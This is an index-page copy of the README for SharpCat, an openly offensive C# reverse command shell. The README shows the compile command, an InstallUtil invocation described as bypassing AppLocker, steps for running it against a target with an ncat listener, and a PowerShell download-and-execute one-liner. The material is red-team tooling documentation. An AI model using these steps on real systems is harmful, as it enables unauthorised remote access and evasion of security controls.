Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/Cn33liz/SharpCat
SharpCat - A Simple Reversed Command Shell which can be started using InstallUtil (Bypassing AppLocker)
https://github.com/Cn33liz/SharpCat
Last synced: 2 months ago
JSON representation
SharpCat - A Simple Reversed Command Shell which can be started using InstallUtil (Bypassing AppLocker)
- Host: GitHub
- URL: https://github.com/Cn33liz/SharpCat
- Owner: Cn33liz
- License: bsd-3-clause
- Created: 2016-06-10T10:22:02.000Z (over 8 years ago)
- Default Branch: master
- Last Pushed: 2016-06-10T11:06:08.000Z (over 8 years ago)
- Last Synced: 2024-08-03T02:02:46.404Z (5 months ago)
- Language: C#
- Homepage:
- Size: 7.81 KB
- Stars: 47
- Watchers: 5
- Forks: 25
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- Awesome-Security-Resources - SharpCat
README
```
_________.__ _________ __
/ _____/| |__ _____ _____________ \_ ___ \_____ _/ |_
\_____ \ | | \\__ \\_ __ \____ \/ \ \/\__ \\ __\
/ \| Y \/ __ \| | \/ |_> > \____/ __ \| |
/_______ /|___| (____ /__| | __/ \______ (____ /__|
\/ \/ \/ |__| \/ \/
v0.1
```A Simple Reversed Command Shell which can be started using InstallUtil (Bypassing AppLocker) - by Cn33liz 2016
Compile:
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:"C:\Utils\SharpCat.exe" /platform:anycpu "C:\Utils\SharpCat.cs"
```To Bypass Applocker:
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Utils\SharpCat.exe
```### How to use it:
* Setup a remote TCP Listener (for example ncat -lvp 443) https://nmap.org/ncat/
* Change IP/Port as needed, then Compile and run the SharpCat Executable on your target (or use the above InstallUtil trick).
Within the Remote Command Shell you can run PowerShell commands as follow:
```
C:\>PowerShell "Get-Help Invoke-*"
```
Or
```
C:\>PowerShell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/trollsploit/Get-RickAstley.ps1'); Get-RickAstley"
```
### Todo* Build more NetCat like functions within the code (File Transfers, Bind Shell, UDP Transport).